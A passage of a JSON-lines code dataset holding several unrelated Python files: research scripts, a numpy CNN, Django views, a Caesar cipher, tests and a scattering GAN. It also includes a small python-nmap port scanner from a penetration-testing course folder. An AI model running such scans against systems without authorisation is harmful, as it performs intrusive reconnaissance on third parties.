exampleTestFilters()\n","sub_path":"ExampleTest.py","file_name":"ExampleTest.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"430393482","text":"#!/usr/bin/env python\nimport sys\ntry:\n import nmap\nexcept:\n sys.exit(\"[!] Install the nmap library: pip install python-nmap\")\n\n# Argument Validator\nif len(sys.argv) != 3:\n sys.exit(\"[!] Please provide two arguments the first being the targets the second the ports\")\n\nports = str(sys.argv[2])\naddrs = str(sys.argv[1])\n\nscanner = nmap.PortScanner()\nscanner.scan(addrs, ports)\n\nfor host in scanner.all_hosts():\n if not scanner[host].hostname():\n print(\"The host's IP address is %s and it's hostname was not found\" %host)\n else:\n print(\"The host's IP address is %s and it's hostname is %s\" %(host, scanner[host].hostname()))\n","sub_path":"PenetrationTesting/Module1/Chap03/nmap_scanner.py","file_name":"nmap_scanner.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"180919739","text":"\"\"\"\nTrain in syllable localizer (ka, fi, nu) test in task\n\"\"\"\nimport pickle\nimport os.path as op\nimport pandas as pd\nfrom data.R1022_160204 import meg_files, session\n\n# data_path = '/media/DATA/Pro/Projects/NewYork/audio_wm/data/'\ndata_path = op.join('/media/jrking/harddrive/Audio_sequence/data/', session)\n\nruns = meg_files.query('typ == \"main\"')\nall_events = list()\nfor ii, run in runs.iterrows():\n bhv = op.join(data_path, run.bhv)\n\n # Read behavior file and make event DataFrame\n with open(bhv, 'rb') as f:\n bhv = pickle.load(f)\n events = list()\n for t, trial in enumerate(bhv.entries):\n for typ in ['target', 'probe']:\n for n in range(trial['n_sounds']):\n mismatch = trial['mismatch_position'] == n and typ == 'probe'\n events.append(dict(\n onset=trial['trigger_on_%s_%i' % (typ, n)],\n offset=trial['trigger_off_%s_%i' % (typ, n)],\n trigger=trial['trigger_value_%s_%i' % (typ, n)],\n sound=trial[typ][n].split('_f5')[0],\n type=typ, trial=t, sound_idx=n,\n mismatch=mismatch,\n mismatch_position=trial['mismatch_position']))\n all_events += events\nevents_main = pd.DataFrame(all_events)\nwith open(op.join(data_path, 'sounds-eve.pkl'), 'wb') as f:\n pickle.dump(events_main, f)\n","sub_path":"scripts/analysis/pilots/R1022_2.4.16/get_behavior.py","file_name":"get_behavior.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"617490534","text":"# Contextualy irrelevant features for Obesity\nnoncontext = np.array(['MAMMOUSE','PAPTEST','BPMED','TEETHLOST','DENTAL']) \n# Already known effects of Obesity\nknown_effects_of_obesity = np.array(['CHD','BPHIGH','ARTHRITIS','DIABETES','HIGHCHOL','PHLTH','KIDNEY','STROKE'])\n# Drop above two from our dataframe\ncensus_data_Obesity = census_data_req.drop(np.concatenate([noncontext,known_effects_of_obesity]),axis=1)\ncensus_data_Obesity.drop(['MHLTH','COREM','COPD','COLON_SCREEN'],axis=1,inplace=True)\n\n# Contextualy irrelevant features for Cancer\nnoncontext_cancer = np.array(['MAMMOUSE','TEETHLOST','DENTAL']) \n# Drop above two from our dataframe\ncensus_data_Cancer = 
census_data_req.drop(np.concatenate([noncontext_cancer]),axis=1)","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"159422806","text":"import numpy as np\n\nimport h5py\nimport time\nimport copy\nfrom random import randint\n\n############################\n# SINGLE HIDDEN LAYER #\n# MULTIPLE KERNELS #\n############################\n\n\n\n# Elementwise ReLU nonlinearity to produce the hidden layer\ndef sigma(Z):\n return np.maximum(Z,0,Z)\n\n# Convolution of matrix X with the filter K\ndef convolution(X, K, stride):\n #col_stride = row_stride = X[0,0].itemsize\n\n\n\n\n Z = np.zeros((X.shape[0]-K.shape[0]+1, X.shape[1]-K.shape[1]+1, K.shape[2]))\n for m in range(0, Z.shape[0]-1, stride):\n for n in range(0, Z.shape[1]-1, stride):\n for k in range(0, Z.shape[2]):\n Z[m,n,k] = np.vdot(X[m:m+K.shape[0], n:n+K.shape[1]], K[:,:,k])\n return Z\n\ndef hidden_linear(H, W, bk):\n U = np.zeros((W.shape[0]))\n for k in range(W.shape[0]):\n U[k] = np.vdot(W[k], H) + bk[k]\n\n return U\n\n# [000,,,1,,,,00000]\ndef e(elem, K):\n ret = np.zeros(K)\n ret[elem] = 1\n return ret\n\n# Softmax Function\ndef softmax(vec):\n #assuming vec is 1-d\n exp_vec = np.exp(vec)\n vsum = np.float32(1/np.float32(sum(exp_vec)))\n exp_vec *= vsum\n return exp_vec\n\ndef sigma_prime(Z):\n return (1/1+np.exp(-1*Z))\n\n\ndef partial_K(sigma_prime, delta, X):\n return convolution(X, (sigma_prime*delta), 1)\n\n\ndef partial_U(soft, e_Y):\n return -1*(e_Y-soft)\n\n\ndef partial_W(partial_b, H):\n ret = np.zeros((partial_b.shape[0], H.shape[0], H.shape[1], H.shape[2]))\n for i in range(ret.shape[0]):\n ret[i] = partial_b[i]*H\n return ret\n\ndef delta(W, partial_u):\n delt = np.zeros((W.shape[1], W.shape[2], W.shape[3]))\n for i in range(partial_u.shape[0]):\n delt += partial_u[i]*W[i]\n return delt\n\n\ndef param_update(param, ALPHA, grad):\n return param - (ALPHA*grad)\n\n# def final_param(param):\n# sum = param[0]\n# for i in range(1, param.shape[0]):\n# sum += param[i]\n\n# return sum\n\n \n\n\n\n\nMNIST_data = h5py.File('../MNISTdata.hdf5', 'r')\n\nx_train = np.float32(MNIST_data['x_train'][:])\ny_train = np.int32(np.array(MNIST_data['y_train'][:, 0]))\nx_test = np.float32(MNIST_data['x_test'][:])\ny_test = np.int32(np.array(MNIST_data['y_test'][:, 0]))\n\nMNIST_data.close()\n\n#######################################################################\ndef NN(EPOCH, ALPHA, filter_dim):\n # IMPLEMENT Neural Network\n\n num_inputs = 28*28\n input_dim = 28\n num_outputs = 10\n num_filters = 32\n K = np.random.randn(filter_dim, filter_dim, num_filters) / np.sqrt(num_filters)\n b = np.random.randn(num_outputs) / np.sqrt(num_outputs)\n W = np.random.randn(num_outputs, input_dim - filter_dim + 1, input_dim - filter_dim + 1, num_filters) / np.sqrt(input_dim - filter_dim + 1)\n\n for ep in range(EPOCH):\n print(ep)\n shuffle = np.arange(x_train.shape[0])\n np.random.shuffle(shuffle)\n shuffle_x = x_train[shuffle]\n shuffle_y = y_train[shuffle]\n for i in range(len(shuffle_x)):\n print(i)\n\n X = (shuffle_x[i]).reshape((28,28))\n\n # FORWARD STEP\n Z = convolution(X, K, 1)\n H = sigma(Z)\n U = hidden_linear(H,W,b)\n soft_x = softmax(U)\n e_y = e(shuffle_y[i], num_outputs)\n\n # CALCULATE PARTIAL DERIVATIVES\n par_u = partial_U(soft_x, e_y)\n par_w = partial_W(par_u, H)\n delt = delta(W, par_u)\n par_k = partial_K(sigma_prime(Z), delt, X)\n\n # UPDATE PARAMETERS\n\n K = 
param_update(K, ALPHA, par_k)\n W = param_update(W, ALPHA, par_w)\n b = param_update(b, ALPHA, par_u)\n\n\n #final_K = final_param(K)\n #final_W = final_param(W)\n\n\n #######################################################################\n\n # Test Data\n\n total_correct = 0\n\n for n in range(len(x_test)):\n y = y_test[n]\n x = x_test[n][:]\n x = x.reshape((28,28))\n Z = convolution(x, K, 1)\n H = sigma(Z)\n U = hidden_linear(H, W, b)\n soft_x = softmax(U)\n prediction = np.argmax(soft_x)\n if (prediction == y):\n total_correct += 1\n\n print (total_correct/np.float(len(x_test)))\n\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 1, Filter = 5\")\nNN(1, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 2, Filter = 5\")\nNN(2, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 3, Filter = 5\")\nNN(3, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 4, Filter = 5\")\nNN(4, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\nstart = time.time()\nprint(\"ALPHA = 0.003, EPOCHS = 5, Filter = 5\")\nNN(5, 0.003, 5)\nprint(\"Time Taken: \", (time.time() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 1, Filter = 8\")\n# NN(1, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 2, Filter = 8\")\n# NN(2, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 3, Filter = 8\")\n# NN(3, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n# print(\"ALPHA = 0.003, EPOCHS = 2, Filter = 8\")\n# NN(4, 0.003, 8)\n# print(\"Time Taken: \", (time.clock() - start))\n\n\n","sub_path":"cs398/deep-learning/Convolution_NN/multiple_filter_conv.py","file_name":"multiple_filter_conv.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"553223713","text":"from django.shortcuts import render,redirect\nfrom .models import Entry\nfrom django.contrib.auth.models import User\n\n# Create your views here. 
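# Both views assume the Entry model (imported from .models, not shown here)
# exposes `text`, `user` and `date_posted` fields: `home` lists the logged-in
# user's entries newest-first, and `add` saves a POSTed `data` value as a new
# Entry for that user before re-rendering home.html with the refreshed list.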
\ndef home(request):\n log_user=request.user\n entries = Entry.objects.filter(user=log_user).order_by('-date_posted') \n return render(request,'home.html',{'m':entries})\n # entries = Entry.objects.order_by('-date_posted')\n # context = {'entries' : entries}\n #return render(request,'home.html',context)\n\ndef add(request):\n if request.method == 'POST':\n data=request.POST['data']\n new=Entry(text=data, user=request.user)\n new.save()\n log_user=request.user\n entries = Entry.objects.filter(user=log_user).order_by('-date_posted')\n return render(request,'home.html',{'m':entries})\n \n #if form.is_valid():\n # form.save()\n # return redirect('/') \n else:\n return render(request,'add.html')","sub_path":"entries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"133721904","text":"def ceasarCijfer():\n tekst = input(\"Geef een tekst: \")\n rotatie = int(input(\"Geef een rotatie: \"))\n alfabet = 'aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ'\n ceasarCode = ''\n for character in tekst:\n if character in alfabet:\n a = alfabet.index(character)\n if a > (len(alfabet) - rotatie*2):\n index = rotatie*2 - (len(alfabet) - a)\n ceasarCode += alfabet[index]\n else:\n ceasarCode += alfabet[a+rotatie*2]\n else:\n ceasarCode += character\n\n print(ceasarCode)\n\n\nceasarCijfer()","sub_path":"Ceasarcijfer.py","file_name":"Ceasarcijfer.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"359169353","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\"\"\"\nTest schemas module\n\"\"\"\nimport pytest\n\npytest.importorskip(\n \"watertap.edb.schemas\", reason=\"Missing optional dependencies for EDB schemas\"\n)\nfrom ..schemas import schemas\nfrom ..data_model import Reaction\n\n\n@pytest.mark.unit\ndef test_schemas():\n assert \"$schema\" in schemas[\"component\"]\n assert \"$schema\" in schemas[\"reaction\"]\n\n\n@pytest.mark.unit\ndef test_reaction_order_required():\n input = {\n \"name\": \"foo\",\n \"components\": [],\n \"elements\": [\"Ca\", \"O\", \"H\"],\n # valid chemistry? no. useful? 
yes.\n Reaction.NAMES.param: {\n \"reaction_order\": {\n \"Liq\": {\"B\": 2, \"C\": 1, \"H\": 1},\n \"Vap\": {\"B\": 1, \"C\": -2, \"H\": 1},\n \"Sol\": {\"B\": -1, \"C\": 2, \"H\": 0},\n }\n },\n \"type\": \"equilibrium\",\n }\n r = Reaction(input) # should be OK\n del input[Reaction.NAMES.param][\"reaction_order\"]\n r = Reaction(input) # still should be ok\n","sub_path":"watertap/edb/tests/test_schemas.py","file_name":"test_schemas.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"246176692","text":"# # Is Unique: \n# Implement an algorithm to determine if a string has all unique characters. \n# \n# What if you cannot use additional data structures?\n\n\ndef is_unique_dict(inputs):\n d = {}\n for cha in inputs:\n if cha in d:\n return False\n else:\n d[cha] = 0\n return True\n\ndef is_unique_arr(inputs):\n arr = [False]*128\n for cha in inputs:\n if arr[ord(cha)]:\n return False\n else:\n arr[ord(cha)] = True\n return True\n\ndef is_unique_bit(inputs):\n checker = 0\n for cha in inputs:\n cha_in_num = ord(cha)-ord(\" \")\n if checker & 1 << cha_in_num:\n return False\n else: \n checker |= 1 << cha_in_num\n return True \n","sub_path":"01_ArraysAndStrings/Python/IsUnique.py","file_name":"IsUnique.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642917456","text":"from __future__ import print_function\nfrom IPython import display\nimport torch\nfrom torch import nn\nfrom torch.optim import Adam\nfrom torch.autograd import Variable\nimport torch.nn.init as init\nfrom torchvision import transforms, datasets\nimport argparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport pylab as plt\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.tri as mtri\n#%matplotlib inline\nfrom matplotlib import colors\nfrom IPython import display\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nimport plotly.graph_objs as go\nfrom plotly.graph_objs import Scatter, Figure, Layout\nimport numpy as np\nimport time\nimport math\nimport pytorch_fft.fft.autograd as fft\npi = math.pi\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--test_id', type=int, required=True, help='id of current test')\nparser.add_argument('--datasize', type=int, default=2**12, help='size of 1D signal')\nparser.add_argument('--lambda_true', type=float, default=0.025, help='intensity of poisson from true data')\nparser.add_argument('--nepochs', type=int, default=300, help='number of total epochs')\nparser.add_argument('--batchsize', type=int, default=64, help='batchsize for each training step')\nparser.add_argument('--layer2', type=bool, default=True, help='whether to do second layer scattering')\nparser.add_argument('--l2', type=bool, default=False, help='whether to do l2 norm in scattering')\nparser.add_argument('--norm', type=bool, default=False, help='whether to add scattering of normalized signal')\nparser.add_argument('--ntestsample', type=int, default=16, help='number of samples for testing, >= 16')\nparser.add_argument('--p1', type=int, default=1, help='scattering moments for the first layer')\nparser.add_argument('--p2', type=int, default=1, help='scattering moments for the second layer')\nparser.add_argument('--output_scale', type=float, default=5, help='maximal height of output signal from generator')\nparser.add_argument('--Q', type=int, default=2, help='scale intervals for 
defining wavelets')\nparser.add_argument('--J', type=int, default=4, help='largest scale for defining wavelets')\nparser.add_argument('--xi', type=float, default=np.asarray([pi/6]), help='central frequency of 1st layer wavelets')\nparser.add_argument('--xi2', type=float, default=np.asarray([pi/4]), help='central frequency of 2nd layer wavelets')\nparser.add_argument('--c', type=int, default=2, help='s2/s1, proportion of wavelet scales between 2nd and 1st layer')\nopt = parser.parse_args()\n\nntest=opt.test_id\nn = opt.datasize\nlambda_true = opt.lambda_true\nnum_epochs = opt.nepochs\nbatch_size = opt.batchsize\nlayer2 = opt.layer2\nl2 = opt.l2\nnorm = opt.norm\nnum_test_samples = opt.ntestsample\noutput_scale = opt.output_scale\np1 = opt.p1\np2 = opt.p2\nQ = opt.Q\nJ = opt.J\nxi = opt.xi\nxi2 = opt.xi2\nc = opt.c\nprint('parameter defined!')\n\nx_data = np.load('./data/x_homo_regular.npy')\nndata = x_data.shape[0]\nx_data = torch.from_numpy(np.reshape(x_data,[-1,1,n])).float()\nx_fake_data = np.load('./data/x_homo_fake.npy')\nx_fake_data = torch.from_numpy(np.reshape(x_fake_data,[-1,1,n])).float()\nnbatch = ndata // batch_size # number of batches in one epoch\nprint('Data loaded!')\n\nclass scattering(torch.nn.Module):\n def __init__(self, g_real_hat, g_imag_hat, g2_real_hat, g2_imag_hat, l2, layer2, norm, batch_size, n, p1, p2, eps = 1e-7):\n # Two-layer scattering module.\n \n # g_real_hat: real part of wavelets in frequency in the first scattering layer\n # g_imag_hat: imagery part of wavelets in frequency in the first scattering layer\n # g2_real_hat: real part of wavelets in frequency in the second scattering layer\n # g2_imag_hat: imagery part of wavelets in frequency in the second scattering layer\n # l2, layer2, norm: whether to do l2 norm, second layer scattering and signal normalization with heights {1,-1}\n # batch_size: length of batch\n # n: signal length\n # p1, p2: moments of first and second layer\n \n super(scattering, self).__init__()\n self.g_real_hat = g_real_hat.unsqueeze(0) # shape 1 * nwave * n\n self.g_imag_hat = g_imag_hat.unsqueeze(0)\n self.g2_real_hat = g2_real_hat.unsqueeze(0) # shape 1 * nwave * n\n self.g2_imag_hat = g2_imag_hat.unsqueeze(0)\n self.batch_size = batch_size\n self.nwave = g_real_hat.shape[0]\n self.x_imag = torch.zeros(self.batch_size, 1, n, 1) # imagery part of x is zero\n self.x2_imag = torch.zeros(self.batch_size, self.nwave, n, 1) \n if torch.cuda.is_available():\n self.x_imag = self.x_imag.cuda()\n self.x2_imag = self.x2_imag.cuda()\n \n self.layer2 = layer2\n self.norm = norm\n self.p1 = p1\n self.p2 = p2\n self.eps = eps \n \n def forward(self, x_real): \n # x_real: batch_size * 1 * n\n self.x_real = x_real.unsqueeze(3)\n self.x = torch.cat((self.x_real, self.x_imag), 3) # batch_size * 1 * n * 2\n \n # convolution in frequency\n x_hat = torch.fft(self.x, 1) # fft\n # multiply in freq batch_size * nwave * n\n y_real_hat = x_hat[:,:,:,0] * self.g_real_hat - x_hat[:,:,:,1] * self.g_imag_hat \n y_imag_hat = x_hat[:,:,:,0] * self.g_imag_hat + x_hat[:,:,:,1] * self.g_real_hat\n # ifft, batch_size * nwave * n * 2\n y = torch.ifft(torch.cat((y_real_hat.unsqueeze(3), y_imag_hat.unsqueeze(3)), 3), 1) \n \n # nonlinear operator: modulus, batch_size * nwave * n\n temp = torch.sqrt(y[:,:,:,0]**2 + y[:,:,:,1]**2) \n \n # 1st order scattering\n s = torch.mean(temp**self.p1, 2)\n \n # 2nd order scattering\n if self.layer2:\n temp = temp.unsqueeze(3)\n temp2 = torch.zeros(self.batch_size, nwave, n)\n if torch.cuda.is_available():\n temp2 = temp2.cuda()\n 
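            # Second layer: raise the first-layer modulus to p1, FFT it, multiply by
            # each second-layer wavelet in the frequency domain, invert, take the
            # modulus again, and time-average its p2-th power into the output s.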
x2 = torch.cat((temp**self.p1, self.x2_imag), 3) # batch_size * nwave * n * 2\n x2_hat = torch.fft(x2, 1)\n for i in range(self.nwave):\n # batch_size * n\n y2_real_hat = x2_hat[:,i,:,0] * self.g2_real_hat[:,i,:] - x2_hat[:,i,:,1] * self.g2_imag_hat[:,i,:] \n y2_imag_hat = x2_hat[:,i,:,0] * self.g2_imag_hat[:,i,:] + x2_hat[:,i,:,1] * self.g2_real_hat[:,i,:]\n # batch_size * n * 2\n y2 = torch.ifft(torch.cat((y2_real_hat.unsqueeze(2), y2_imag_hat.unsqueeze(2)), 2), 1) \n \n # nonlinear operator: modulus, batch_size * nwave * n\n temp2[:, i, :] = torch.sqrt(y2[:,:,0]**2 + y2[:,:,1]**2) \n s = torch.cat((s, torch.mean(temp2**self.p2, 2)), 1)\n \n # normalize signal to height {1, -1}\n if self.norm:\n self.z_imag = torch.zeros(self.batch_size, 1, n, 1) # imagery part of x is zero\n self.z2_imag = torch.zeros(self.batch_size, self.nwave, n, 1) \n if torch.cuda.is_available():\n self.z_imag = self.z_imag.cuda()\n self.z2_imag = self.z2_imag.cuda()\n \n self.z_real = (torch.abs(self.x_real) > self.eps).float() * torch.sign(self.x_real)\n self.z = torch.cat((self.z_real, self.z_imag), 3) # batch_size * 1 * n * 2\n \n # convolution in frequency\n z_hat = torch.fft(self.z, 1) # fft\n # multiply in freq batch_size * nwave * n\n w_real_hat = z_hat[:,:,:,0] * self.g_real_hat - z_hat[:,:,:,1] * self.g_imag_hat \n w_imag_hat = z_hat[:,:,:,0] * self.g_imag_hat + z_hat[:,:,:,1] * self.g_real_hat\n # ifft, n_batch * nwave * n * 2\n w = torch.ifft(torch.cat((w_real_hat.unsqueeze(3), w_imag_hat.unsqueeze(3)), 3), 1) \n \n # nonlinear operator: modulus, batch_size * nwave * n\n temp = torch.sqrt(w[:,:,:,0]**2 + w[:,:,:,1]**2) \n\n # 1st order scattering\n s = torch.cat((s, torch.mean(temp**self.p, 2)), 1)\n\n # 2nd order scattering\n if self.layer2:\n temp = temp.unsqueeze(3)\n temp2 = torch.zeros(self.batch_size, nwave, n)\n z2 = torch.cat((temp**self.p1, self.z2_imag), 3) # batch_size * nwave * n * 2\n z2_hat = torch.fft(z2, 1)\n for i in range(self.nwave):\n # batch_size * n\n w2_real_hat = z2_hat[:,i,:,0] * self.g2_real_hat[:,i,:] - z2_hat[:,i,:,1] * self.g2_imag_hat[:,i,:] \n w2_imag_hat = z2_hat[:,i,:,0] * self.g2_imag_hat[:,i,:] + z2_hat[:,i,:,1] * self.g2_real_hat[:,i,:]\n \n # batch_size * n * 2\n w2 = torch.ifft(torch.cat((w2_real_hat.unsqueeze(2), w2_imag_hat.unsqueeze(2)), 2), 1) \n # nonlinear operator: modulus, batch_size * nwave * n\n temp2[:, i, :] = torch.sqrt(w2[:,:,0]**2 + w2[:,:,1]**2) \n s = torch.cat((s, torch.mean(temp2**self.p2, 2)), 1)\n return s.unsqueeze(1) # batch_size * 1 * nf\n \n \n\nclass Generator(torch.nn.Module):\n \n def __init__(self, output_scale, out_active = 'tanh'):\n super(Generator, self).__init__()\n self.output_scale = output_scale\n\n self.l1 = nn.Sequential(\n nn.Linear(100, 1024),\n nn.Tanh()\n )\n self.l2 = nn.Sequential(\n nn.Linear(1024, 256*256),\n nn.Tanh()\n )\n \n self.conv1 = nn.Sequential(\n nn.ConvTranspose1d(\n in_channels=256, out_channels=128, kernel_size=8,\n stride=4, padding=2, bias=False\n ),\n nn.BatchNorm1d(128),\n nn.Tanh()\n )\n self.conv2 = nn.Sequential(\n nn.ConvTranspose1d(\n in_channels=128, out_channels=1, kernel_size=8,\n stride=4, padding=2, bias=False\n )\n )\n if out_active == 'tanh':\n self.out = torch.nn.Tanh()\n elif out_active == 'sigmoid':\n self.out = torch.nn.Sigmoid()\n\n def forward(self, x):\n # Project and reshape\n x = self.l1(x)\n x = self.l2(x)\n x = x.view(x.shape[0], 256, 16*16)\n # Convolutional layers\n x = self.conv1(x)\n x = self.conv2(x)\n # Apply Tanh\n return self.output_scale * self.out(x)\n \n\n\n# 
Noise\ndef noise(size):\n n = Variable(torch.randn(size, 100))\n if torch.cuda.is_available(): return n.cuda()\n return n\n\ndef init_weights(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1 or classname.find('BatchNorm') != -1:\n m.weight.data.normal_(0.00, 0.02)\n\ndef plot_signals(ntest, epoch, signals):\n n = 16\n fig = plt.figure(figsize = (10,10))\n for i in range(n):\n plt.subplot(4,4,i+1)\n plt.plot(signals[i,:])\n frame1 = plt.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n np.save('./result/scat_gen_signal%s_%s.npy'%(ntest, epoch), signals)\n plt.savefig('./result/scat_gen_signal%s_%s'%(ntest, epoch))\n\ndef gabor_wave_1d(n, s, xi):\n # generate one 1D gabor wavelet \n x = np.arange(n)\n chi = np.zeros(n)\n chi[0:s] = 1/s\n# chi[0:s] = 1\n \n o = np.exp(1j * xi * x)\n \n psi = np.multiply(chi, o)\n \n psi_hat = np.fft.fft(psi)\n return psi, psi_hat\n \n\ndef gabor_wave_family_1d(n, s, xi):\n # generate a family of 1D gabor wavelets with specified scales and rotations in space\n ns = s.shape[0]\n nxi = xi.shape[0]\n \n psi = np.zeros((n, ns, nxi),dtype=complex)\n psi_hat = np.zeros((n, ns, nxi),dtype=complex)\n for i in range(ns):\n for k in range(nxi):\n psi[:, i, k], psi_hat[:, i, k] = gabor_wave_1d(n, int(s[i]), xi[k])\n return psi, psi_hat\n\ndef bump_wave_1d(n, s, xi):\n # generate one 1D gabor wavelet \n x = np.arange(n)\n chi = np.zeros(n)\n t = np.arange(s - 1) + 1\n chi[1:s] = np.exp( - s**2 / (4 * t * s - 4 * t**2))\n# chi[0:s] = 1\n \n o = np.exp(1j * xi * x)\n \n psi = np.multiply(chi, o)\n \n psi_hat = np.fft.fft(psi)\n return psi, psi_hat\n\ndef bump_wave_family_1d(n, s, xi):\n # generate a family of 1D gabor wavelets with specified scales and rotations in space\n ns = s.shape[0]\n nxi = xi.shape[0]\n \n psi = np.zeros((n, ns, nxi),dtype=complex)\n psi_hat = np.zeros((n, ns, nxi),dtype=complex)\n for i in range(ns):\n for k in range(nxi):\n psi[:, i, k], psi_hat[:, i, k] = bump_wave_1d(n, int(s[i]), xi[k])\n return psi, psi_hat\n\ndef estimate_lambda(x, epsilon = 0.8):\n lambda_hat = np.zeros(x.shape[0]) \n for i in range(x.shape[0]):\n ind = np.append([0], np.where(x[i,:] > epsilon))\n if ind.shape[0] > 1:\n ind_delta = np.diff(ind).squeeze()\n lambda_hat[i] = 1/np.mean(ind_delta)\n return np.mean(lambda_hat)\n\n# define wavelets\n\n# epsilon = 1e-4\n# sigma = determine_sigma(epsilon)\n# Q = 2\n# alpha = 2\n# J = determine_J(n, Q, sigma, alpha)\n# J = 4\ns = np.unique(np.floor(2 ** np.linspace(1, J, int(J*Q)+1-Q)))\n#s = np.array([1,2,4,8,10,16,31,63,129,257,513])\n# xi = 2 * pi * np.random.choice(n,1) / n\n# xi2 = 2 * pi * np.random.choice(n,1) / n\n# np.save('./result/xi_%s.npy'%ntest, xi)\n# np.save('./result/xi2_%s.npy'%ntest, xi2)\n\ng, g_hat = gabor_wave_family_1d(n,s,xi)\ng = np.reshape(g, (g.shape[0], -1)) # n * nwave\nnwave = g.shape[1]\ng_hat = np.swapaxes(np.reshape(g_hat, (g_hat.shape[0], -1)), 0, 1) # nwave * n\ng_real_hat = torch.from_numpy(np.real(g_hat)).float()\ng_imag_hat = torch.from_numpy(np.imag(g_hat)).float()\n\ns2 = s * c\ng2, g2_hat = gabor_wave_family_1d(n,s2,xi2)\ng2 = np.reshape(g2, (g2.shape[0], -1)) # n * nwave\ng2_hat = np.swapaxes(np.reshape(g2_hat, (g2_hat.shape[0], -1)), 0, 1) # nwave * n\ng2_real_hat = torch.from_numpy(np.real(g2_hat)).float()\ng2_imag_hat = torch.from_numpy(np.imag(g2_hat)).float()\n\nif torch.cuda.is_available():\n g_real_hat = g_real_hat.cuda()\n g_imag_hat = g_imag_hat.cuda()\n g2_real_hat = g2_real_hat.cuda()\n g2_imag_hat = 
g2_imag_hat.cuda()\nprint('wavelets defined')\n\n\n\ntest_noise = noise(num_test_samples)\n# logger = Logger(model_name='DCGAN', data_name='MNIST')\ng_error_sum = []\n\n\n# Create Network instances and init weights\ngenerator = Generator(output_scale)\ngenerator.apply(init_weights)\n# generator.load_state_dict(torch.load('./result/scat_GAN_GEN_test%s'%(ntest - 1), map_location=lambda storage, loc: storage))\n\nnf = nwave\nif l2:\n nf = 2 * nf\nif layer2:\n nf = 2 * nf\nif norm:\n nf = 2 * nf\nprint('nf: ',nf) \n\nscatter = scattering(g_real_hat, g_imag_hat, g2_real_hat, g2_imag_hat, l2, layer2, norm, batch_size, n, p1, p2)\nscatter.apply(init_weights)\n\n# Enable cuda if available\nif torch.cuda.is_available():\n generator.cuda()\n scatter.cuda()\n \n# Optimizers\ng_optimizer = Adam(generator.parameters(), lr=0.000005, betas=(0.5, 0.999))\n\n# Loss function\nloss = nn.MSELoss()\n\nprint('Model initialized!')\n\nfor epoch in range(num_epochs):\n print('epoch:',epoch)\n for idx in range(nbatch):\n real_batch = x_data[idx * batch_size:(idx + 1)*batch_size, :]\n # 1. Train Discriminator\n real_data = Variable(real_batch)\n if torch.cuda.is_available(): real_data = real_data.cuda()\n s_real = scatter(real_data)\n \n # Train Generator\n # Generate fake data\n fake_data = generator(noise(real_batch.size(0)))\n # Train G\n # g_error = train_generator(g_optimizer, fake_data)\n g_optimizer.zero_grad()\n # Sample noise and generate fake data\n s_fake = scatter(fake_data)\n # Calculate error and backpropagate\n #print('prediction fake: ', prediction[0])\n g_error = loss(s_fake, s_real)\n g_error.backward()\n # Update weights with gradients\n g_optimizer.step()\n # Return error\n \n #print(torch.mean(d_error).data.cpu())\n g_error_sum.append(float(torch.mean(g_error).data.cpu()))\n \n test_signals = generator(test_noise).squeeze(1).data.cpu().numpy()\n plot_signals(ntest, epoch, test_signals)\n lamb_est = estimate_lambda(test_signals)\n print('estimated lambda: ', lamb_est)\n np.save('./result/scat_gen_loss%s.npy'%ntest, np.asarray(g_error_sum))\n torch.save(generator.state_dict(), 